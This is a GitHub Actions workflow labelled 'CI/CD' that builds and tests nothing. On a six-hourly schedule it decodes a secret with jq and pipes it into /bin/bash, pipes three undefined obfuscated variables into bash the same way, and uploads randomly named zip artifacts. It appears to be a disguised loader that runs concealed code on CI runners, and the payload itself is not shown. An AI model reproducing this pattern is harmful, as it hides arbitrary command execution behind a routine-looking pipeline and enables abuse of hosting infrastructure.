name: CI/CD
on:
  workflow_dispatch:

  schedule:
    - cron: '46 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          j36138: ${{ secrets.j36138 }}
        run: |
          printf '%s' "$j36138" | jq -r .qtn71 | /bin/bash
          printf '%s' "$jcle9" | jq -r .w930 | /bin/bash
          echo $a7 | jq -r .d248 | /bin/bash
          echo $ngy9568 | jq -r .ti6452 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: O2eF04pO
          path: "*.zip"
          retention-days: 1
